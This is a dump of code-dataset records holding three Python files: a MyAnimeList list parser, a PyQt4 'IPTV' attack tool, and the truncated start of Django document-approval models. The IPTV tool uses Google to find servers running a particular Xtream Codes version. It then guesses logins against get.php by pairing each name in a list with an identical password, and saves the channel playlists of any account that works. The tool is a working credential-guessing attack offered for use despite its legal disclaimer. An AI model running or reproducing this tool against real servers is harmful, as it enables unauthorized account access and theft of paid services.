"numpy.matmul", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 136, "usage_type": "call"}]} {"seq_id": "246995937", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport abc\nimport collections\nfrom lxml import etree as et\nimport decimal\nimport datetime\nimport urllib.request, urllib.parse, urllib.error\n\nfrom . 
import utilities\nfrom .base import Base, MalformedPageError, InvalidBaseError, loadable\n\n\nclass MalformedMediaListPageError(MalformedPageError):\n pass\n\n\nclass InvalidMediaListError(InvalidBaseError):\n pass\n\n\nclass MediaList(Base, collections.Mapping, metaclass=abc.ABCMeta):\n _id_attribute = \"username\"\n\n def __getitem__(self, media):\n return self.list[media]\n\n def __contains__(self, media):\n return media in self.list\n\n def __len__(self):\n return len(self.list)\n\n def __iter__(self):\n for media in self.list:\n yield media\n\n def __init__(self, session, user_name):\n super(MediaList, self).__init__(session)\n self.username = user_name\n if not isinstance(self.username, str) or len(self.username) < 1:\n raise InvalidMediaListError(self.username)\n self._list = None\n self._stats = None\n\n # subclasses must define a list type, ala \"anime\" or \"manga\"\n @abc.abstractmethod\n def type(self):\n pass\n\n # a list verb ala \"watch\", \"read\", etc\n @abc.abstractmethod\n def verb(self):\n pass\n\n # a list with status ints as indices and status texts as values.\n @property\n def user_status_terms(self):\n statuses = collections.defaultdict(lambda: 'Unknown')\n statuses[1] = self.verb.capitalize() + 'ing'\n statuses[2] = 'Completed'\n statuses[3] = 'On-Hold'\n statuses[4] = 'Dropped'\n statuses[6] = 'Plan to ' + self.verb.capitalize()\n return statuses\n\n def parse_entry_media_attributes(self, soup):\n \"\"\"\n Args:\n soup: a lxml.html.HtmlElement containing a row from the current media list\n\n Return a dict of attributes of the media the row is about.\n \"\"\"\n row_info = {}\n\n try:\n start = utilities.parse_profile_date(soup.find('.//series_start').text)\n except ValueError:\n start = None\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n if start is not None:\n try:\n row_info['aired'] = (start, utilities.parse_profile_date(soup.find('.//series_end').text))\n except ValueError:\n row_info['aired'] = (start, None)\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n # look up the given media type's status terms.\n status_terms = getattr(self.session, self.type)(1)._status_terms\n\n try:\n row_info['id'] = int(soup.find('.//series_' + self.type + 'db_id').text)\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n row_info['title'] = soup.find('.//series_title').text\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n row_info['status'] = status_terms[int(soup.find('.//series_status').text)]\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n row_info['picture'] = soup.find('.//series_image').text\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n return row_info\n\n def parse_entry(self, soup):\n \"\"\"\n Given:\n soup: a lxml.html.HtmlElement containing a row from the current media list\n\n Return a tuple:\n (media object, dict of this row's parseable attributes)\n \"\"\"\n # parse the media object first.\n media_attrs = self.parse_entry_media_attributes(soup)\n media_id = media_attrs['id']\n del media_attrs['id']\n media = getattr(self.session, self.type)(media_id).set(media_attrs)\n\n entry_info = {}\n try:\n entry_info['started'] = utilities.parse_profile_date(soup.find('.//my_start_date').text)\n except ValueError:\n entry_info['started'] = None\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n entry_info['finished'] = utilities.parse_profile_date(soup.find('.//my_finish_date').text)\n except 
ValueError:\n entry_info['finished'] = None\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n entry_info['status'] = self.user_status_terms[int(soup.find('.//my_status').text)]\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n entry_info['score'] = int(soup.find('.//my_score').text)\n # if user hasn't set a score, set it to None to indicate as such.\n if entry_info['score'] == 0:\n entry_info['score'] = None\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n try:\n entry_info['last_updated'] = datetime.datetime.fromtimestamp(int(soup.find('.//my_last_updated').text))\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n\n return media, entry_info\n\n def parse_stats(self, soup):\n \"\"\"\n Given:\n soup: a lxml.etree element containing the current media list's stats\n\n Return a dict of this media list's stats.\n \"\"\"\n stats = {}\n for row in soup.getchildren():\n try:\n key = row.tag.replace('user_', '')\n if key == 'id':\n stats[key] = int(row.text)\n elif key == 'name':\n stats[key] = row.text\n elif key == self.verb + 'ing':\n try:\n stats[key] = int(row.text)\n except ValueError:\n stats[key] = 0\n elif key == 'completed':\n try:\n stats[key] = int(row.text)\n except ValueError:\n stats[key] = 0\n elif key == 'onhold':\n try:\n stats['on_hold'] = int(row.text)\n except ValueError:\n stats[key] = 0\n elif key == 'dropped':\n try:\n stats[key] = int(row.text)\n except ValueError:\n stats[key] = 0\n elif key == 'planto' + self.verb:\n try:\n stats['plan_to_' + self.verb] = int(row.text)\n except ValueError:\n stats[key] = 0\n # for some reason, MAL doesn't substitute 'read' in for manga for the verb here\n elif key == 'days_spent_watching':\n try:\n stats['days_spent'] = decimal.Decimal(row.text)\n except decimal.InvalidOperation:\n stats[key] = decimal.Decimal(0)\n except:\n if not self.session.suppress_parse_exceptions:\n raise\n return stats\n\n def parse(self, xml):\n list_info = {}\n list_page = et.fromstring(xml.encode())\n\n primary_elt = list_page\n if primary_elt is None:\n raise MalformedMediaListPageError(self.username, xml,\n message=\"Could not find root XML element in \" + self.type + \" list\")\n\n bad_username_elt = list_page.find('.//error')\n if bad_username_elt is not None:\n raise InvalidMediaListError(self.username, message=\"Invalid username when fetching \" + self.type + \" list\")\n\n stats_elt = list_page.find('.//myinfo')\n if stats_elt is None and not utilities.check_if_mal_response_is_empty(list_page):\n raise MalformedMediaListPageError(self.username, xml,\n message=\"Could not find stats element in \" + self.type + \" list\")\n\n if utilities.check_if_mal_response_is_empty(list_page):\n raise InvalidMediaListError(self.username, message=\"Empty result set when fetching \" + self.type + \" list\")\n\n list_info['stats'] = self.parse_stats(stats_elt)\n\n list_info['list'] = {}\n for row in list_page.findall(\".//%s\" % self.type):\n (media, entry) = self.parse_entry(row)\n list_info['list'][media] = entry\n\n return list_info\n\n def load(self):\n media_list = self.session.get('https://myanimelist.net/malappinfo.php?' 
+ urllib.parse.urlencode(\n            {'u': self.username, 'status': 'all', 'type': self.type})).text\n        self.set(self.parse(media_list))\n        return self\n\n    @property\n    @loadable('load')\n    def list(self):\n        return self._list\n\n    @property\n    @loadable('load')\n    def stats(self):\n        return self._stats\n\n    def section(self, status):\n        return {k: self.list[k] for k in self.list if self.list[k]['status'] == status}\n", "sub_path": "myanimelist/media_list.py", "file_name": "media_list.py", "file_ext": "py", "file_size_in_byte": 9254, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "base.MalformedPageError", "line_number": 15, "usage_type": "name"}, {"api_name": "base.InvalidBaseError", "line_number": 19, "usage_type": "name"}, {"api_name": "base.Base", "line_number": 23, "usage_type": "name"}, {"api_name": "collections.Mapping", "line_number": 23, "usage_type": "attribute"}, {"api_name": "abc.ABCMeta", "line_number": 23, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 48, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 53, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 170, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 170, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 220, "usage_type": "call"}, {"api_name": "decimal.InvalidOperation", "line_number": 221, "usage_type": "attribute"}, {"api_name": "decimal.Decimal", "line_number": 222, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 230, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 230, "usage_type": "name"}, {"api_name": "urllib.request.parse.urlencode", "line_number": 259, "usage_type": "call"}, {"api_name": "urllib.request.parse", "line_number": 259, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 259, "usage_type": "name"}, {"api_name": "base.loadable", "line_number": 265, "usage_type": "call"}, {"api_name": "base.loadable", "line_number": 270, "usage_type": "call"}]} {"seq_id": "56384", "text": "# -*- coding: utf-8 -*-\n#########################################################################\n# This program is free software; you can redistribute it and/or modify  #\n# it under the terms of the GNU General Public License as published by  #\n# the Free Software Foundation; either version 2 of the License, or     #\n# (at your option) any later version.                                   #\n#                                                                       #\n# This program is distributed in the hope that it will be useful,       #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of        #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         #\n# GNU General Public License for more details.                          #\n#                                                                       #\n# You should have received a copy of the GNU General Public License     #\n# along with this program; if not, write to the Free Software           #\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,            #\n# MA 02110-1301, USA.                                                   #\n############################# DISCLAIMER ################################\n# Usage of this software for probing/attacking targets without prior    #\n# mutual consent, is illegal. It's the end user's responsibility to     #\n# obey all applicable local laws. 
Developers assume no liability and    #\n# are not responsible for any misuse or damage caused by this program   #\n#########################################################################\n\n#by Pinperepette - The Pirate\n\nfrom PyQt4 import QtCore, QtGui\nimport urllib2\nimport google\nimport os\nimport time\nimport sys\nfrom urlparse import urlparse\nimport subprocess\ntry:\n    _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n    def _fromUtf8(s):\n        return s\n\ntry:\n    _encoding = QtGui.QApplication.UnicodeUTF8\n    def _translate(context, text, disambig):\n        return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n    def _translate(context, text, disambig):\n        return QtGui.QApplication.translate(context, text, disambig)\n\n#Parameters\nsearch = \"Xtream Codes v1.0.59.5\"\nmsg = \"\"\nll = \"\"\n\ndirectory = \"output\"\nnames = \"names.txt\"\n\n#this works on mac... fix it for all the other systems, dammit !!! :P \ndef apri():\n    subprocess.Popen(['open', \"output\"])\n\n\nclass Ui_Form(QtGui.QWidget):\n    def __init__(self, parent=None):\n        QtGui.QWidget.__init__(self, parent)\n    def setupUi(self, Form):\n        Form.setObjectName(_fromUtf8(\"Form\"))\n        Form.resize(609, 321)\n        self.gridLayout = QtGui.QGridLayout(Form)\n        self.gridLayout.setObjectName(_fromUtf8(\"gridLayout\"))\n\n        self.comboBox = QtGui.QComboBox(Form)\n        self.comboBox.setObjectName(_fromUtf8(\"comboBox\"))\n        self.link = []\n        self.comboBox.addItems(self.link)\n\n        self.gridLayout.addWidget(self.comboBox, 0, 0, 1, 2)\n        self.verticalLayout = QtGui.QVBoxLayout()\n        self.verticalLayout.setObjectName(_fromUtf8(\"verticalLayout\"))\n        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)\n        self.verticalLayout.addItem(spacerItem)\n\n        self.lcdNumber = QtGui.QLCDNumber(Form)\n        self.lcdNumber.setObjectName(_fromUtf8(\"lcdNumber\"))\n\n        self.verticalLayout.addWidget(self.lcdNumber)\n        spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)\n        self.verticalLayout.addItem(spacerItem1)\n\n        self.dial = QtGui.QDial(Form)\n        self.dial.setObjectName(_fromUtf8(\"dial\"))\n\n        self.verticalLayout.addWidget(self.dial)\n        spacerItem2 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)\n        self.verticalLayout.addItem(spacerItem2)\n\n        self.pushButton_3 = QtGui.QPushButton(Form)\n        self.pushButton_3.setObjectName(_fromUtf8(\"pushButton_3\"))\n        self.pushButton_3.clicked.connect(self.search_link)\n\n        self.verticalLayout.addWidget(self.pushButton_3)\n        spacerItem3 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)\n        self.verticalLayout.addItem(spacerItem3)\n\n        self.pushButton_2 = QtGui.QPushButton(Form)\n        self.pushButton_2.setObjectName(_fromUtf8(\"pushButton_2\"))\n        self.connect(self.pushButton_2, QtCore.SIGNAL(\"released()\"), self.action)\n\n        self.verticalLayout.addWidget(self.pushButton_2)\n        spacerItem4 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)\n        self.verticalLayout.addItem(spacerItem4)\n\n        self.pushButton = QtGui.QPushButton(Form)\n        self.pushButton.setObjectName(_fromUtf8(\"pushButton\"))\n        self.pushButton.clicked.connect(apri)\n\n        self.verticalLayout.addWidget(self.pushButton)\n        self.gridLayout.addLayout(self.verticalLayout, 0, 2, 5, 1)\n        self.line = QtGui.QFrame(Form)\n        self.line.setFrameShape(QtGui.QFrame.HLine)\n        self.line.setFrameShadow(QtGui.QFrame.Sunken)\n        self.line.setObjectName(_fromUtf8(\"line\"))\n        self.gridLayout.addWidget(self.line, 
1, 0, 1, 2)\n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setObjectName(_fromUtf8(\"label_2\"))\n self.gridLayout.addWidget(self.label_2, 2, 0, 1, 1)\n self.lineEdit = QtGui.QLineEdit(Form)\n self.lineEdit.setObjectName(_fromUtf8(\"lineEdit\"))\n self.gridLayout.addWidget(self.lineEdit, 2, 1, 1, 1)\n self.line_2 = QtGui.QFrame(Form)\n self.line_2.setFrameShape(QtGui.QFrame.HLine)\n self.line_2.setFrameShadow(QtGui.QFrame.Sunken)\n self.line_2.setObjectName(_fromUtf8(\"line_2\"))\n self.gridLayout.addWidget(self.line_2, 3, 0, 1, 2)\n\n self.terminal = QtGui.QListWidget(Form)\n self.terminal.setObjectName(_fromUtf8(\"terminal\"))\n self.terminal.setStyleSheet(_fromUtf8(\"color: rgb(0, 220, 67);\\n\" \"background-color:rgb(4, 4, 4)\"))\n self.threadPool = []\n\n self.gridLayout.addWidget(self.terminal, 4, 0, 1, 2)\n\n self.retranslateUi(Form)\n QtCore.QObject.connect(self.comboBox, QtCore.SIGNAL(_fromUtf8(\"currentIndexChanged(QString)\")), self.lineEdit.setText)\n QtCore.QObject.connect(self.dial, QtCore.SIGNAL(_fromUtf8(\"valueChanged(int)\")), self.lcdNumber.display)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate(\"Form\", \"IPTV\", None))\n self.pushButton_3.setText(_translate(\"Form\", \"Search\", None))\n self.pushButton_2.setText(_translate(\"Form\", \"Attack\", None))\n self.pushButton.setText(_translate(\"Form\", \"Open\", None))\n self.label_2.setText(_translate(\"Form\", \"TARGET :\", None))\n\n def search_link(self,text=\"CoccoDio\",iters=6,delay=0.1):\n global ll\n number = int(self.lcdNumber.value())\n for url in google.search(search, num = number, stop = 1):\n parsed = urlparse(url)\n ll = str(parsed.scheme + \"://\" + parsed.netloc)\n self.link.append( LlThread() )\n self.connect( self.link[len(self.link)-1], QtCore.SIGNAL(\"update(QString)\"), self.add_ll )\n self.link[len(self.link)-1].start()\n time.sleep(delay)\n\n\n def add(self, text):\n self.terminal.addItem(text)\n self.terminal.sortItems()\n\n def add_ll(self, text):\n self.comboBox.addItem(text)\n\n def segnale(self, delay=0.1):\n self.threadPool.append( MsgThread() )\n self.connect( self.threadPool[len(self.threadPool)-1], QtCore.SIGNAL(\"update(QString)\"), self.add )\n self.threadPool[len(self.threadPool)-1].start()\n time.sleep(delay)\n\n def Attack(self,text=\"CoccoDio\",iters=6,delay=0.1):\n global msg\n global URL\n URL = str(self.lineEdit.text())\n if URL == \"\":\n msg = \"select a target\"\n self.segnale()\n else:\n msg = (\"Attack URL: \" + URL )\n self.segnale()\n rows = open(names , \"r\")\n NR = len(rows.readlines())\n TT = (str(NR))\n n = NR\n msg = (\"the list contains \" + TT + \" elements\")\n self.segnale()\n tr = 0\n with open(names) as f:\n content = f.readlines()\n for r in content:\n req = urllib2.Request( URL + \"/get.php?username=%s&password=%s&type=m3u&output=mpegts\" % (r.rstrip().lstrip(), r.rstrip().lstrip()))\n response = urllib2.urlopen(req)\n the_page = response.read()\n NR = (NR - 1)\n TM = (str(NR))\n msg = (\"request number \" + TM + \" of \" + TT + \" for name: \" + r.rstrip().lstrip())\n self.segnale()\n if len(the_page) > 0:\n tr = (tr + 1)\n msg = \"account found !!! 
\"\n self.segnale()\n new_path = directory + \"/\" + URL.replace(\"http://\", \"\")\n if os.path.exists(new_path) is False:\n os.makedirs(new_path)\n out_file = open(str(new_path) + \"/tv_channels_%s.m3u\" % r.rstrip().lstrip(), \"w\")\n out_file.write(the_page)\n out_file.close()\n trov = (str(tr))\n msg = (\"Accounts found: \" + trov)\n self.segnale()\n\n\n def action_ll(self):\n self.link.append( GenericThread(self.Attack,ll,delay=0.1) )\n self.disconnect( self, QtCore.SIGNAL(\"add(QString)\"), self.add_ll )\n self.connect( self, QtCore.SIGNAL(\"add(QString)\"), self.add_ll )\n self.link[len(self.link)-1].start()\n\n def action(self):\n self.threadPool.append( GenericThread(self.Attack,msg,delay=0.1) )\n self.disconnect( self, QtCore.SIGNAL(\"add(QString)\"), self.add )\n self.connect( self, QtCore.SIGNAL(\"add(QString)\"), self.add )\n self.threadPool[len(self.threadPool)-1].start()\n\nclass MsgThread(QtCore.QThread):\n def __init__(self):\n QtCore.QThread.__init__(self)\n\n def __del__(self):\n self.wait()\n\n def run(self):\n time.sleep(0.1)\n self.emit( QtCore.SIGNAL('update(QString)'), msg )\n return\n\nclass LlThread(QtCore.QThread):\n def __init__(self):\n QtCore.QThread.__init__(self)\n\n def __del__(self):\n self.wait()\n\n def run(self):\n time.sleep(0.1)\n self.emit( QtCore.SIGNAL('update(QString)'), ll )\n return\n\nclass GenericThread(QtCore.QThread):\n def __init__(self, function, *args, **kwargs):\n QtCore.QThread.__init__(self)\n self.function = function\n self.args = args\n self.kwargs = kwargs\n\n def __del__(self):\n self.wait()\n\n def run(self):\n self.function(*self.args,**self.kwargs)\n return\n\nif __name__ == \"__main__\":\n import sys\n app = QtGui.QApplication(sys.argv)\n Form = QtGui.QWidget()\n ui = Ui_Form()\n ui.setupUi(Form)\n Form.show()\n sys.exit(app.exec_())\n\n", "sub_path": "iptv/iptv_gui.py", "file_name": "iptv_gui.py", "file_ext": "py", "file_size_in_byte": 11136, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "PyQt4.QtCore.QString", "line_number": 35, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 41, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QApplication.translate", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QApplication.translate", "line_number": 46, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 46, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 46, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 58, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 61, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget.__init__", "line_number": 63, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 63, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 63, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 67, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 67, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QComboBox", "line_number": 70, 
"usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 70, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 76, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 76, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 78, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 78, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSizePolicy", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QLCDNumber", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 81, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 85, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSizePolicy", "line_number": 85, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QDial", "line_number": 88, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 88, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 92, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 92, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSizePolicy", "line_number": 92, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 95, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 95, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 100, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 100, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSizePolicy", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 103, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 103, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 105, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 105, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSpacerItem", "line_number": 108, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 108, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QSizePolicy", "line_number": 108, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 111, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 117, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 117, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 118, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 118, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 119, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 119, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 122, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 122, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 125, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 125, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 128, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 129, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 129, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFrame", "line_number": 130, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 130, 
"usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidget", "line_number": 134, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 134, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QObject.connect", "line_number": 142, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QObject", "line_number": 142, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 142, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 142, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QObject.connect", "line_number": 143, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QObject", "line_number": 143, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 143, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 143, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QMetaObject.connectSlotsByName", "line_number": 144, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QMetaObject", "line_number": 144, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 144, "usage_type": "name"}, {"api_name": "google.search", "line_number": 156, "usage_type": "call"}, {"api_name": "urlparse.urlparse", "line_number": 157, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 160, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 160, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 162, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 174, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 174, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 176, "usage_type": "call"}, {"api_name": "urllib2.Request", "line_number": 198, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 211, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 222, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 222, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 223, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 223, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 228, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 228, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 229, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 229, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 232, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 232, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread.__init__", "line_number": 234, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 234, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 234, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 240, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 241, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 241, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 244, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 244, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread.__init__", "line_number": 246, "usage_type": "call"}, {"api_name": 
"PyQt4.QtCore.QThread", "line_number": 246, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 246, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 252, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 253, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 253, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 256, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 256, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QThread.__init__", "line_number": 258, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QThread", "line_number": 258, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 258, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 272, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 272, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 272, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 273, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 273, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 277, "usage_type": "call"}]} {"seq_id": "226769007", "text": "from __future__ import unicode_literals, absolute_import\nfrom django.utils import timezone\nfrom django.utils.safestring import mark_safe\nfrom django.contrib.postgres.fields import JSONField\nfrom django.contrib.gis.db import models\n\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import timedelta, datetime\n\nfrom tracking import models as tracking\n\n\nCRITICALITY_CHOICES = (\n (1, 'Critical'),\n (2, 'Moderate'),\n (3, 'Low'),\n)\nIMPORTANCE_CHOICES = (\n (1, 'High'),\n (2, 'Medium'),\n (3, 'Low'),\n)\nDOC_STATUS_CHOICES = (\n (1, 'Draft'),\n (2, 'Released'),\n (3, 'Superseded'),\n)\n\n\nclass DocumentApproval(models.Model):\n \"\"\"A model to represent an approval/endorsement by a DepartmentUser for an\n uploaded file.\n \"\"\"\n department_user = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT)\n approval_role = models.CharField(\n max_length=256, blank=True, null=True,\n help_text='The role in which the user is approving the document.')\n evidence = models.FileField(\n blank=True, null=True, max_length=255, upload_to='uploads/%Y/%m/%d',\n help_text='Optional evidence to support the document approval (email, etc.)')\n date_created = models.DateTimeField(auto_now_add=True, editable=False)\n\n def __str__(self):\n if self.approval_role:\n return \"{}, {} ({})\".format(\n self.department_user, self.approval_role,\n 